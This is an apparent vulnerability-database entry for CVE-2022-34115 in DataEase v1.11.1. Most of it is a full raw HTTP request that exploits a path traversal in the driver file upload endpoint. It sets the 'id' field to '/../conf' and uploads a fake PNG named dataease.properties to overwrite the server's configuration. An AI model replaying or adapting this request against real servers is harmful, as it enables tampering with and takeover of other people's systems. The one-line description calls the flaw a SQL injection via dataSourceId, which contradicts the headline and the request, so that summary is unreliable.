Headline
CVE-2022-34115: [Bug]任意文件跨目录写入 · Issue #2428 · dataease/dataease
Dataease v1.11.1 was discovered to contain a SQL injection vulnerability via the parameter dataSourceId.
POST /driver/file/upload HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: xxx
Content-Type: multipart/form-data; boundary=---------------------------70362338610608895491036095575
Content-Length: 1167
Origin: http://10.211.55.18
Connection: close
Referer: http://10.211.55.18/
Cookie:
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="id"
/../conf
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="name"
123
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="createTime"
1654829420814
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="type"
mysql
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="driverClass"
null
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="desc"
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="typeDesc"
MySQL
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="showModel"
show
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="file"; filename="dataease.properties"
Content-Type: image/png
123
-----------------------------70362338610608895491036095575--